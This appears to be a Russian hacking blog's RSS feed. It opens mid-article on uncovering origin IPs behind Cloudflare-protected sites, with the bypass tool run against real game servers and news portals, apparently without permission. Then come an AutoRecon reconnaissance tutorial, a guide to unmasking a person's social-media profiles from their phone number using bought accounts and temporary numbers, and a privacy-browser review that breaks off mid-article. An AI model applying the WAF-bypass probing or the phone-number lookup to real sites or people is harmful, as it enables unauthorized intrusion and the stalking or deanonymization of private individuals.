  <pre>$ dig &lt;DOMAIN&gt; NS +short
</pre>
  <p>Утилита выведет нам список DNS-серверов, к которым подключен сайт. Если ты увидишь DNS сервера Cloudflare или других WAF, это означает, что сайт находится под защитой от DOS- и DDоS-атак.</p>
  <p>Команду для тестирования будем использовать тоже общую:</p>
  <pre>$ bash bypass-firewalls-by-DNS-history.sh -d &lt;Your_target&gt; -a
</pre>
  <p>Итак, поехали. Возьмем для примера один игровой сайт, защищенный Cloudflare. Домен я по понятным причинам показывать не стану. Попробуем использовать нашу утилиту для пробива WAF и посмотрим, добьемся ли мы успеха.</p>
  <figure class="m_column">
    <img src="https://i2.wp.com/cryptoworld.su/wp-content/uploads/2020/06/7.jpg?resize=960%2C488&ssl=1" width="960" />
    <figcaption>Результат пробива</figcaption>
  </figure>
  <p>Как видишь, мы получили список возможных байпасов, но он слишком огромный, и у каждого IP своя оценка вероятности. Это говорит о том, что не так-то просто пробить крупные компании.</p>
  <p>Теперь посмотрим на один из серверов для совместной игры в Minecraft. Они тоже часто пользуются услугами защиты от DoS и DDoS.</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/8.jpg?resize=960%2C488&ssl=1" width="960" />
    <figcaption>Результат пробива</figcaption>
  </figure>
  <p>Для эксперимента я беру первые попавшиеся серверы. Этот был зарубежным, и его защита выстояла.</p>
  <p>Попробуем что-нибудь более беззащитное — мне под руку попался кастомный ролевой сервер игры GTA V.</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/9.jpg?resize=960%2C488&ssl=1" width="960" />
    <figcaption>Результат пробива</figcaption>
  </figure>
  <p>Стопроцентный успех. Однако сервер был настолько скромным, что пришлось принудительно остановить полное сканирование.</p>
  <p>Теперь проверим несколько новостных сайтов. Первой «жертвой» (в кавычках, поскольку никакого вреда мы не причинили) выступил один популярный новостной портал.</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/10.jpg?resize=960%2C485&ssl=1" width="960" />
    <figcaption>Результат пробива</figcaption>
  </figure>
  <p>Мы получили огромное количество ошибок. Они связаны с тем, что сервер журнала ограничил нам возможность делать запросы. Однако утилите это не помешало добиться успеха. В самом первом отчете был найден байпас с вероятностью в 100%, однако это был поддомен.</p>
  <p>Далее попробуем зарубежный образовательный журнал.</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/11.jpg?resize=960%2C488&ssl=1" width="960" />
    <figcaption>Результат пробива</figcaption>
  </figure>
  <p>Можно заметить, что программа уже начала отваливаться, но все же попыталась найти в поддоменах байпасы. Процент успеха достаточно мал.</p>
  <p>И наконец, последний кандидат.</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/12.jpg?resize=960%2C487&ssl=1" width="960" />
    <figcaption>Результат пробива</figcaption>
  </figure>
  <p>Успех! Найден стопроцентный байпас.</p>
  <h3>Выводы</h3>
  <p>Как видишь, этим методом действительно можно отыскивать верные байпасы. Конечно, не всегда это получается качественно, иначе WAF вообще были бы бесполезными. Однако, наткнувшись на один из них, не опускай руки, ведь в твоем арсенале теперь еще пара действенных инструментов.</p>
  <p>Спасибо Матвееву за статью.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/4nhv6Ep2O</guid><link>https://teletype.in/@hata_hack/4nhv6Ep2O?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/4nhv6Ep2O?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Разведка цели: Работаем с AutoRecon</title><pubDate>Thu, 27 Aug 2020 07:39:09 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/6b/21/6b21ee11-c4f1-4cad-a7fd-f51e2f032174.jpeg"></media:content><description><![CDATA[<img src="https://telegra.ph/file/1ba3b92f22a67a42eca08.jpg"></img>Привет, Аноним. Сегодня я расскажу тебе о том, почему этап разведки занимает так много времени и как можно его оптимизировать с помощью AutoRecon - https://github.com/Tib3rius/AutoRecon. Разберемся, что это за инструмент, для чего он нужен и чем он лучше Nmap. Также просканируем несколько целей, чтобы понять, какие результаты можно увидеть по завершению работы этого &quot;чуда&quot;. AutoRecon действительно является уникальным решением в своем роде и позволяет существенно улучшить процесс.]]></description><content:encoded><![CDATA[
  <p>Привет, Аноним. Сегодня я расскажу тебе о том, почему этап разведки занимает так много времени и как можно его оптимизировать с помощью AutoRecon - <a href="https://github.com/Tib3rius/AutoRecon" target="_blank">https://github.com/Tib3rius/AutoRecon</a>. Разберемся, что это за инструмент, для чего он нужен и чем он лучше Nmap. Также просканируем несколько целей, чтобы понять, какие результаты можно увидеть по завершению работы этого &quot;чуда&quot;. AutoRecon действительно является уникальным решением в своем роде и позволяет существенно улучшить процесс.</p>
  <h3>Введение</h3>
  <p>Хотелось бы написать два слова о том, как в целом устроены сайты, веб-приложения и как потенциально можно найти уязвимости. Давай представим, что существует некий сайт site.com и размещен он на физическом сервере, который выходит в мир с IP 195.208.131.1. Предположим, что наш сайт site.com доступен по 80(HTTP) и 443(HTTPS) порту, имеет базу данных на порту 5432(PostgreSQL) и еще несколько других сервисов на разных портах. И у нас есть задача, проверить безопасность сайта site.com и сервера 195.208.131.1.</p>
  <p>Первое, что нужно сделать — просканировать хост с IP 195.208.131.1 и понять какие порты открыты и какие сервисы запущены. Это можно сделать с помощью Nmap.</p>
  <pre>$ nmap -sC -sV -p- 195.208.131.1
</pre>
  <p>Пример логов:</p>
  <pre>nmap -sC -sV -p- 195.208.131.1
PORT   STATE SERVICE    VERSION
21/tcp  open ftp      Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp  open http  fuelCMS 1.4.1
111/tcp  open rpcbind    2-4 (RPC #100000)
135/tcp  open msrpc     Microsoft Windows RPC
139/tcp  open netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open fuelCMS 1.4.1
445/tcp  open microsoft-ds?
2049/tcp open mountd    1-3 (RPC #100005)
5432/tcp openc PostgreSQL
</pre>
  <p>Таким образом, у нас есть список портов и установленных сервисов. Дальше нам нужно проверить, является ли эта версия уязвимой и возможно для этой версии есть готовые эксплоиты. Для этого мы можем воспользоваться установленной утилитой searchsploit (в одном из сканов мы нашли версию):</p>
  <pre>$ searchsploit fuelCMS 1.4.1
</pre>
  <figure class="m_column">
    <img src="https://telegra.ph/file/1ba3b92f22a67a42eca08.jpg" width="1151" />
  </figure>
  <p>Видим, что для этой версии есть уязвимость RCE и есть эксплоит 47138.py. Поэтому, логическая цепочка происходит именно таким образом. Сначала мы сканируем хост, находим открытые порты и сервисы, проверяем их на уязвимость или на небезопасную конфигурацию. Это и будет нашей потенциальной точкой входа.</p>
  <h3>Без разведки — никуда</h3>
  <p>Из предыдущего блока становится понятно, почему нам всегда начинаем со сканирования. Нужно получить список портов TCP/UDP, собрать версии установленных компонентов, собрать информацию по SMB, пройти по WEB-части и т.д. Это достаточно большой кусок работы, который нужно выполнять каждый раз. Тем более что по каждому из пунктов приходиться использовать по 3-4 утилиты. По каждому инструменту есть логи, и это нужно как-то обрабатывать и хранить. Особенно сложно работать, если в работе сразу несколько хостов. Я думаю каждый, кто с этим сталкивался, понимает сколько времени на это уходит.</p>
  <p>Для ускорения и упрощения процесса разведки был создан инструмент <a href="https://github.com/Tib3rius/AutoRecon" target="_blank"><strong>AutoRecon</strong></a>. Это универсальное решение, которое позволяет автоматически просканировать и проанализировать результаты и на выходе получить полную картину в понятном и удобном формате.</p>
  <p>При запуске AutoRecon первым делом проверяет открытые порты на хосте с помощью Nmap. По умолчанию одновременно запускается 3 сканирования:</p>
  <ul>
    <li>полное сканирование топ 1000 TCP портов;</li>
    <li>полное сканирование всех TCP портов;</li>
    <li>сканирование топ 20 UDP портов.</li>
  </ul>
  <p><strong>AutoRecon</strong> выполняет одновременно два сканирования по TCP-портам с целью получить быстрее открытые порты и проанализировать результаты, не дожидаясь полного сканирования TCP портов. Таким образом, можно быстрее получить точку входу. После того, как были найдены открытые порты, AutoRecon запускает проверку сервисов на этих портах, используя вспомогательные скрипты и инструменты. Например, если будет найден Web сервер, то AutoRecon запустит Whatweb, Nikt, Gobuster, Nmap скрипты для Web серверов, попробует скачать robots.txt и т.д. По результатам работы инструментов будут собраны результаты и добавлены в логи.</p>
  <h3>Как установить AutoRecon?</h3>
  <p>Установку я буду выполнять на Kali Linux2020.2. Более детальный мануал с другими вариантами установки можно найти по <a href="https://github.com/Tib3rius/AutoRecon" target="_blank">ссылке</a>. Для работы AutoRecon нужен Python3. Поэтому установка будет начинаться с инструментов для работы с Python3. Если на машине уже есть Python3 и Pip3, то этот шаг можно пропустить.</p>
  <pre>$ sudo apt install python3
$ sudo apt install python3-pip
</pre>
  <p>Для своей работы AutoRecon использует большое количество компонентов. Ниже список того, что может быть задействовано при сканировании. AutoRecon может работать и без них, но качество результатов будет намного ниже. Можно попросту пропустить точку входа, а в логах останется только фейл при вызове какого-то инструмента.</p>
  <pre>curl
enum4linux
gobuster
nbtscan
nikto
nmap
onesixtyone
oscanner
smbclient
smbmap
smtp-user-enum
snmpwalk
sslscan
svwar
tnscmd10g
whatweb
wkhtmltoimage
</pre>
  <p>Для установки этих всех компонентов нужно выполнить команду (будет работать на Kali Linux). С помощью второй команды можно убедиться, что все инструменты установлены.</p>
  <pre>$ sudo apt install seclists
$ sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner smbclient smbmap smtp-user-enum snmp sslscan sipvicious tnscmd10g whatweb wkhtmltopdf
</pre>
  <p>Для установки AutoRecon нужно выполнять команду:</p>
  <pre>$ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git
</pre>
  <p>После этого AutoRecon будет успешно установлен и можно запустить с опцией -h:</p>
  <pre>$ autorecon -h
</pre>
  <figure class="m_original">
    <img src="https://telegra.ph/file/f00d31534beda95aa7731.jpg" width="639" />
  </figure>
  <h3>AutoRecon в боевых условиях</h3>
  <p>Проверим AutoRecon в действии. Для этого запустим скан для нескольких целей, и увидим результаты работы. Для базового скана выполняем команду с флагом -o для указания директории для хранения логов, для одновременного сканирования нескольких хостов нужно использовать флаг -t:</p>
  <pre>$ autorecon 10.10.10.180 -o ./
$ autorecon -t targets.txt -o ./
</pre>
  <figure class="m_column">
    <img src="https://telegra.ph/file/f1d3f6a85a530afc4b400.jpg" width="997" />
    <figcaption>Работа AutoRecon</figcaption>
  </figure>
  <p>После начала работы создается папка с IP и туда добавляется вся информация по ходу проверки. Структура имеет достаточно понятный вид:</p>
  <pre>├── exploit/
├── loot/
├── report/
│   ├── local.txt
│   ├── notes.txt
│   ├── proof.txt
│   └── screenshots/
└── scans/
    ├── _commands.log
    ├── _manual_commands.txt
    └── xml/
</pre>
  <figure class="m_original">
    <img src="https://telegra.ph/file/32fc782890ad232d7f75f.jpg" width="567" />
    <figcaption>Содержание папки scans</figcaption>
  </figure>
  <p>По названию папок и файлов понятно их содержимое. Больше всего нас интересует папка <strong>scans</strong>. Внутри логи всех инструментов, которые позволяют проанализировать и увидеть полную картину. Качество и подход к работе впечатляют, проверено все и даже больше. Вбивать каждую команду руками заняло бы достаточное количество времени. Например, в папке <strong>scans </strong>был отчет с названием<strong> tcp_111_nfs_nmap.txt</strong>. AutoRecon показал, что есть раздел <strong>/site_backups </strong>с данными сайта. А это уже является потенциальной точкой входа. Но для этого мы запустили только одну команду и ничего больше.</p>
  <figure class="m_original">
    <img src="https://telegra.ph/file/16a65c9511e9707a6dbc8.jpg" width="701" />
  </figure>
  <p>Стоит также отметить, что в папке <strong>scans </strong>есть другие интересные файлы<strong>:</strong></p>
  <ul>
    <li><strong><em>_commands.log</em></strong> — список выполненных команд в результате работы AutoRecon.</li>
    <li><strong><em>_manual_commands.txt</em></strong> —команды, которые могут потенциально нанести вред таргету (брутфорс и т.д.). Поэтому такие команды лучше запускать вручную с дополнительной настройкой.</li>
    <li><strong><em>_errors.log</em> —</strong> ошибки, которые возникли в ходе работы. Можно проанализировать, какие инструменты не работают, или почему так, или иначе не была проведена проверка.</li>
  </ul>
  <h4>Заключение</h4>
  <p><a href="https://github.com/Tib3rius/AutoRecon" target="_blank"><strong>AutoRecon</strong></a>— полезный и функциональный инструмент, который оптимизирует время на сканирование и анализ сервисов. Его можно использовать, как для тренировочных площадок, CTF, так и для реальных задач. Инструмент позволяет сканировать сразу несколько целей одновременно (5 по дефолту). Также все логи сохраняются отдельно по папкам с понятной структурой. Таким образом, этот инструмент решает достаточно серьезный запрос и позволяет использовать дополнительное время на проведение атак и эксплуатацию уязвимостей.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/3H_SGALSC</guid><link>https://teletype.in/@hata_hack/3H_SGALSC?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/3H_SGALSC?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Находим человека в социальных сетях по номеру телефона</title><pubDate>Thu, 27 Aug 2020 06:43:46 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/2b/11/2b1125be-57f3-4f29-a9a8-f2d4c653bad0.png"></media:content><description><![CDATA[<img src="https://telegra.ph/file/a8159d3bce1e1acfaa303.png"></img>Сегодня большинство социальных сетей и мессенджеров используют поиск друзей из вашей записной книги. Это удобно, когда нужно связаться с другом без затрат на сотовую связь либо нужно найти потерявшегося друга при наличии его номера. Но это работает и в обратную сторону. Зачастую это помогает найти человека в социальных сетях при сборе информации о нём.]]></description><content:encoded><![CDATA[
  <p>Сегодня большинство социальных сетей и мессенджеров используют поиск друзей из вашей записной книги. Это удобно, когда нужно связаться с другом без затрат на сотовую связь либо нужно найти потерявшегося друга при наличии его номера. Но это работает и в обратную сторону. Зачастую это помогает найти человека в социальных сетях при сборе информации о нём.</p>
  <p>В этой статье будет рассматриваться исключительно поиск по Вконтакте, Одноклассникам и Instagram.</p>
  <p>Для начала определимся с платформой. Т.к. нам нужны номера из телефонной книги, мы будем использовать мобильное устройство, потому что только в мобильных приложениях присутствует импорт из адресной книги. Однако номеров в книге много и социальные сети будут выдавать множество посторонних личностей. Значит, нам нужна чистая телефонная книга. А такую можно получить, воспользовавшись эмулятором андроид. Лично я пользуюсь <a href="https://www.bluestacks.com/ru/index.html" target="_blank">BlueStacks</a>, но это дело вкуса каждого. Кроме того, нам нужны чистые аккаунты соцсетей, чтобы в выдаче не было лишних рекомендованных друзей. Регистрируются аккаунты на новые номера в сервисах вроде <a href="https://simsms.org/" target="_blank">simsms.org</a>, <a href="https://5sim.net/" target="_blank">5sim.net</a> и прочих. Не используйте бесплатные сервисы хотя бы потому, что у них нету доступных номеров для привязки популярных соцсетей.</p>
  <p>Итак, скачиваем эмулятор и покупаем аккаунт ВК и ОК, это обойдётся в 20-30 руб. Лично у меня часто не приходит код ВК с казахстанских и российских номеров, поэтому я использую латвийские. Inst регистрируем на временную почту, например <a href="https://temp-mail.org/" target="_blank">temp-mail.org</a>. Программы можно просто скачать на компьютер и перетянуть в эмулятор для установки.</p>
  <figure class="m_original">
    <img src="https://telegra.ph/file/a8159d3bce1e1acfaa303.png" width="767" />
    <figcaption>Не у всех может быть программа для звонков. Её тоже не забудьте.</figcaption>
  </figure>
  <p>Первым делом добавляем искомый номер в адресную книгу. Он там должен быть один для исключения выдачи ненужных профилей. Возьмем 1 тестовый номер попробуем пробить его по всем социальным сетям.</p>
  <ol>
    <li><strong>Вконтакте. </strong>Чтобы найти профили, привязанные к этой соц.сети необходимо зайти во вкладку &quot;Друзья&quot;, нажать на плюсик сверху в правом углу, затем выбрать импорт друзей из контактов. Подтверждаем все разрешения и получаем результат. В моем случае выдало 3 профиля. Первый профиль - профиль искомого человека. Остальные два оказались друзьями этого человека.</li>
  </ol>
  <figure class="m_column">
    <img src="https://telegra.ph/file/93e01ad39be01232d9ab8.png" width="1569" />
  </figure>
  <figure class="m_column">
    <img src="https://telegra.ph/file/4e0213232f771338f5763.png" width="1458" />
  </figure>
  <figure class="m_column">
    <img src="https://telegra.ph/file/2103d0f7f587f6888e8fb.png" width="973" />
  </figure>
  <p>2. <strong>Одноклассники. </strong>Аналогичные действия нужно проделать и с одноклассниками, только на вкладке &quot;Друзья&quot; уже есть кнопка импорта друзей из адресной книги. Касаемо поиска по фото, друга вы увидите только после того, как он подтвердит вашу заявку в друзья после поиска по фото. В данном примере мы получили один профиль.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/0767ef312511c48fbaa9f.png" width="1505" />
  </figure>
  <figure class="m_column">
    <img src="https://telegra.ph/file/a4f1fe7eeaacb9e35aea4.png" width="1280" />
  </figure>
  <p>3.<strong> Instagram.</strong> Для импорта друзей необходимо нажать меню в правом перхнем углу и выбрать &quot;Интересные люди&quot;, затем подключить свои контакты и дать разрешение приложению на чтение адресной книги. После этого контакт отобразится в рекомендуемых друзьях. В моём примере так же отобразился один профиль.</p>
  <figure class="m_original">
    <img src="https://telegra.ph/file/1aa183e3b05746f35d56c.png" width="533" />
  </figure>
  <figure class="m_original">
    <img src="https://telegra.ph/file/3410309b24f6046896967.png" width="538" />
  </figure>
  <figure class="m_original">
    <img src="https://telegra.ph/file/47ef0cc1fa7d8d20514ff.png" width="546" />
    <figcaption>Пришлось добавить новый номер, т.к. предыдущий не зарегистрирован в инсте</figcaption>
  </figure>
  <p>После всех действий перед поиском нового номера старый номер рекомендую удалить, чтобы не забивать контакты лишними номерами. Как видите, это совсем не трудно. Главное первый раз настроить систему. Теперь вы умеете искать людей, которые достают вас звонками:)</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/FDdfjDYrf</guid><link>https://teletype.in/@hata_hack/FDdfjDYrf?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/FDdfjDYrf?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Тестируем браузеры, которые обещают не оставлять следов</title><pubDate>Thu, 27 Aug 2020 05:56:50 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/4c/32/4c32e146-518f-4531-97ee-ec6e2e246686.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/9f/d6/9fd69371-167c-4438-b3d5-c6c4c43b181a.png"></img>Когда-то на «Горбушке» водилась особая порода мужичков с хитрым прищуром, у которых обыватели могли приобрести по сходной цене компакт-диск с адресно-телефонной базой жителей Москвы и остального Подмосковья вплоть до Камчатки. Сейчас торговлей персональными данными занимаются куда более крутые ребята: социальные сети конкурируют в этом бизнесе с поисковиками, от которых с небольшим отрывом отстают банки и прочие коммерческие структуры.]]></description><content:encoded><![CDATA[
  <p>Когда-то на «Горбушке» водилась особая порода мужичков с хитрым прищуром, у которых обыватели могли приобрести по сходной цене компакт-диск с адресно-телефонной базой жителей Москвы и остального Подмосковья вплоть до Камчатки. Сейчас торговлей персональными данными занимаются куда более крутые ребята: социальные сети конкурируют в этом бизнесе с поисковиками, от которых с небольшим отрывом отстают банки и прочие коммерческие структуры.</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/9f/d6/9fd69371-167c-4438-b3d5-c6c4c43b181a.png" width="1200" />
  </figure>
  <p>Для трекинга юзеров используются не только файлы cookies и пресловутое отслеживание по IP, но и так называемый отпечаток браузера, включающий данные о версии программы, разрядности ОС, языковых настройках, User Agent, экранном разрешении и иных технических параметрах системы. Еще есть технология Evercookie, реализованная с помощью специального приложения на JavaScript, и поведенческий анализ, когда специальные скрипты собирают информацию о действиях пользователя — времени просмотра веб-страниц, скорости прокрутки, нажатиях на ссылки и прочем. Отследить, а тем более заблокировать все эти функции не так-то просто.</p>
  <p>В настройках любого современного браузера можно отыскать раздел «Безопасность», где собраны связанные с приватностью и конфиденциальностью параметры. Так, в Chrome присутствует режим «безопасного просмотра» веб-страниц со встроенной защитой от «потенциально опасных» сайтов, возможность включить собственную DNS-службу, а также настроить электронные ключи и сертификаты. В Opera есть собственный VPN, больше похожий на банальный прокси, и возможность запретить веб-узлам отслеживать исходящий трафик. Плюс та же стандартная «защита от вредоносных сайтов». Firefox имеет встроенную защиту от трекинга, позволяет настроить параметры хранения паролей, cookies и истории браузера.</p>
  <p>Однако все эти технические ухищрения нивелируются возможностью установки плагинов, которые могут творить почти все, что угодно их разработчикам. Некоторые плагины способны отправлять личные данные на удаленный сервер, отслеживать действия пользователя, встраивать в просматриваемые веб-страницы рекламу. В общем, если элементарная защита от слежки встроена практически во все современные браузеры, то защита от юзера там напрочь отсутствует.</p>
  <p>Считается, что безопасные, или, как их еще называют, защищенные, браузеры — это «чистая» программа без всяких свистелок и дополнений, заточенная под максимальную конфиденциальность. Они позволяют работать в интернете, оставляя минимум цифровых следов, блокируют передачу телеметрии и сбор данных. Они осторожно относятся к файлам cookies, истории просмотра и более бережно хранят данные форм, которые заполняет пользователь, либо не хранят их вовсе. Но главное — большинство из них не поддерживает установку сторонних непроверенных расширений, в числе которых к браузеру может «прилипнуть» что-нибудь нехорошее.</p>
  <p>Когда речь заходит о защищенных программах для просмотра веб-страниц, первым делом вспоминаешь Tor Browser, хорошо известный всем и каждому. Именно поэтому его мы и не будем рассматривать в этой статье. Тем более что Tor Browser чаще используется именно как инструмент для серфинга по даркнету. Вместо него мы пристально взглянем на шесть альтернативных программ, которые их разработчики позиционируют как безопасные и защищенные браузеры для Windows.</p>
  <h3>Доверяй, но проверяй!</h3>
  <p>Чтобы узнать, стоит ли доверять подобным программам, я решил не изобретать сложных стендов и не заниматься постройкой специальной лаборатории. Для сравнения защищенных браузеров вполне достаточно виртуалки со свежеустановленной виндой и нескольких онлайновых тестов, специально созданных для проверки уровня безопасности подобных программ. Вот они.</p>
  <ul>
    <li><a href="https://browsercheck.qualys.com/" target="_blank">Qualys Browser Check</a> — проверяет уязвимости в браузере и тестирует настройки работы с файлами cookies. По умолчанию для прохождения теста предлагается установить специальный плагин, но можно обойтись и без него, воспользовавшись ссылкой на сайте.</li>
    <li><a href="https://www.cloudflare.com/ssl/encrypted-sni/" target="_blank">Cloudflare Browsing Experience Security Check</a> — тест от известной компании Cloudflare, проверяет используемые браузером DNS, сертификаты, настройки cookies и наличие известных уязвимостей.</li>
    <li><a href="https://privacy.net/analyzer/" target="_blank">Privacy Analyzer</a> — комплексная проверка браузера на возможность утечки данных. Проверяется отслеживание по IP, отпечатку браузера, тестируются настройки приватности.</li>
    <li><a href="https://panopticlick.eff.org/" target="_blank">Panopticlick</a> — тест на third-party tracking cookies и отслеживание по отпечатку браузера.</li>
    <li><a href="https://webkay.robinlinus.com/" target="_blank">Webkay</a> — сервис, демонстрирующий всю информацию, которую твой браузер передает веб-сайтам в интернете.</li>
  </ul>
  <p>Итак, с критериями оценки разобрались. Теперь перейдем к нашим подопытным браузерам — какие результаты они нам покажут с настройками по умолчанию? Сейчас узнаем!</p>
  <h3>Comodo Dragon</h3>
  <ul>
    <li>Разработчик: Comodo Group</li>
    <li>Сайт: <a href="https://www.comodo.com/home/browsers-toolbars/browser.php" target="_blank">comodo.com/home/browsers-toolbars/browser.php</a></li>
  </ul>
  <p>Comodo Dragon, пожалуй, самое раскрученное решение для безопасного серфинга в сети после Tor Browser. Dragon претендует на роль универсального решения для тех, кому неохота ждать по полчаса, пока запустится Tor.</p>
  <h3>INFO</h3>
  <p>Репутация Comodo однажды серьезно пострадала — когда в 2016 году компанию уличили в том, что ее продукты <a href="https://xakep.ru/2016/02/20/comodo-geekbuddy/" target="_blank">без спроса ставили на компьютеры VNC-сервер</a>.</p>
  <p>На самом деле чуваки из Comodo сделали целых два секьюрных браузера с одним и тем же набором функций, но на разных движках: Comodo Dragon на платформе Chromium и Ice Dragon на базе Firefox. Среди заявленных возможностей — встроенная защита от малвари, использование безопасных DNS, блокировка cookies и валидация доменов для борьбы с фишингом.</p>
  <p>Я скачал сразу обе версии «Ящерки» и запустил их на виртуалке по очереди. Внешне Dragon выглядит как привычный Chrome и запускается примерно с той же скоростью — на моей виртуалке его загрузка заняла в среднем 4,5 секунды. От «Хрома» браузер унаследовал и любовь к оперативной памяти — с одним окном и одной открытой вкладкой Comodo Dragon с ходу запустил в системе пять процессов и отожрал 90 Мбайт.</p>
  <figure class="m_column">
    <img src="https://xakep.ru/wp-content/uploads/2020/08/317860/secbr_01.jpg#26821622" width="1279" />
    <figcaption>Comodo Dragon, как любой уважающий себя Chromium, любит память</figcaption>
  </figure>
  <p>Что ж, посмотрим, что скажут тесты.</p>
  <ul>
    <li>Qualys Browser Check распознал в Comodo Dragon браузер Chrome, причем устаревшей версии, после чего предложил скачать с сайта Google версию поновее.</li>
    <li>Cloudflare Browsing Experience Security Check определил, что Dragon не проверяет подлинность ответов DNS-серверов с помощью DNSSEC и не поддерживает шифрование имени сервера SNI при установке TLS-соединения, — теоретически это может поставить под угрозу конфиденциальность.</li>
    <li>Тест Privacy Analyzer показал, что Dragon успешно передал удаленному узлу мой IP-адрес, локацию, версию браузера, разрядность ОС и данные об экранном разрешении.</li>
    <li>Panopticlick продемонстрировал, что браузер имеет уникальный «отпечаток» и не посылает на сервер HTTP-флаг DNT (do not track), а это позволяет отслеживать пользователя. Все остальные тесты безопасности на этом сайте Comodo Dragon прошел успешно.</li>
    <li>Наконец, судя по страничке Webkay, помимо версии и разрядности Windows, IP-адреса и экранного разрешения, Dragon позволяет верно распознать уровень заряда батареи моего девайса и тип процессора. Просканировать локальную сеть в поисках доступных устройств браузер не дал.</li>
  </ul>
  <p>Comodo Ice Dragon внешне мало чем отличается от своего «неледяного» собрата. Firefox и Firefox, ничего особенного. Загружается и работает он довольно шустро: от щелчка мышью на значке до запуска приложения прошло три секунды.</p>
  <figure class="m_column">
    <img src="https://xakep.ru/wp-content/uploads/2020/08/317860/secbr_02.jpg#26821622" width="1279" />
    <figcaption>Comodo Ice Dragon похож на обычный Firefox</figcaption>
  </figure>
  <ul>
    <li>Qualys Browser Check не обнаружил никаких недостатков, тест пройден со стопроцентным успехом.</li>
    <li>Cloudflare Browsing Experience Security Check показал в точности тот же результат, что и в предыдущем случае.</li>
    <li>По заключению Privacy Analyzer, браузер отдает наружу все те же данные, что и его родной брат, в том числе IP-адрес и версию ОС.</li>
    <li>Panopticlick сообщил, что программа не блокирует попытки рекламного трекинга, не посылает DNT и имеет уникальный «отпечаток».</li>
    <li>А вот Webkay преподнес сюрприз: оказалось, что браузер имеет уникальный User Agent <code>IceDracon 65.0.2</code> и не отправляет на сторону вообще никаких данных о железе, кроме разрядности процессора. Зато, помимо внешнего айпишника, Webkay радостно продемонстрировал мне IP сетевого интерфейса моей локалки. С помощью специальной кнопки на сайте я попытался просканировать доступные в локальной сети девайсы, но поиск результатов не принес.</li>
  </ul>
  <h3>Waterfox</h3>
  <ul>
    <li>Разработчик: Alex Kontos</li>
    <li>Сайт: <a href="https://waterfox.net/" target="_blank">waterfox.net</a></li>
  </ul>
  <p>Это еще один клон Firefox с упором на безопасность, имеющий версии не только для винды, но и для macOS и Linux, причем доступна только 64-разрядная версия. В разделе «О программе» официального сайта сказано, что браузер сделал в 2011 году шестнадцатилетний школьник Алекс Контос, который занимается обновлением и поддержкой своего детища и по сей день. Автор утверждает, что его приложение не собирает телеметрию и отправляет наружу только данные о версии браузера и ОС, чтобы вовремя получать обновления. Все остальные конфиденциальные, заверяет разработчик, в полной безопасности. Внешне программа представляет собой самый обычный Firefox — настолько обычный, что даже скучно. Работает и загружается с такой же скоростью, существенных различий с обычной «Лисицей» я не заметил.</p>
  <figure class="m_column">
    <img src="https://xakep.ru/wp-content/uploads/2020/08/317860/secbr_03.jpg#26821622" width="1278" />
    <figcaption>Waterfox — это тоже Firefox без особых внешних отличий</figcaption>
  </figure>
  <p>Посмотрим, как оценят поделку школьника тесты.</p>
  <ul>
    <li>Qualys Browser Check — тест пройден успешно, ни одной проблемы не выявлено.</li>
    <li>Cloudflare Browsing Experience Security Check показал, что у Waterfox есть проблемы с проверкой DDNSEC и применением Encrypted SNI. Кроме того, браузер не поддерживает TLS 1.3.</li>
    <li>Наконец, Waterfox успешно провалил все тесты Privacy Analyzer, а по данным Panopticlick и Webkay — слил наружу мой IP-адрес, тип и разрядность процессора, а также параметры экранного разрешения, но все остальные данные благоразумно утаил.</li>
  </ul>
  <p>Примечательно, что Waterfox распознается как Firefox 56.0, в то время как актуальная версия «Лисицы» на сегодняшний день 79.0. То есть клон отстает от оригинала примерно на вечность, и это может означать проблемы уже не с приватностью, а с безопасностью.</p>
  <h3>Iron</h3>
  <ul>
    <li>Разработчик: SRWare</li>
    <li>Сайт: <a href="https://srware.net/iron" target="_blank">srware.net/iron</a></li>
  </ul>
  <p>Iron — это не «ирония», а <s>«утюг»</s> «железо», что как бы намекает нам на брутальность и надежность данного браузера. «Железяка» собрана на основе Chromium, использует последние версии WebKit и V8, а также включает собственный компонент блокировки рекламы. Примечательно, что у сайта разработчика есть русская версия — правда, складывается ощущение, что переведена она на великий и могучий при помощи все того же Google Translate. По утверждениям создателей, Iron не отправляет в Google телеметрию, не отсылает автоматические баг-репорты и не обновляется в фоновом режиме, что позволяет экономить трафик. А еще он обладает «элегантным дизайным».</p>
  <p>SRWare Iron похож на Chrome чуть менее, чем полностью. Программа запускается примерно за 3,5 секунды и работает с несколькими открытыми вкладками довольно-таки шустро: значительных тормозов я за ней не заметил. Мне даже показалось, что этот браузер работает побыстрее, чем Chromium в сборке Comodo.</p>
  <figure class="m_column">
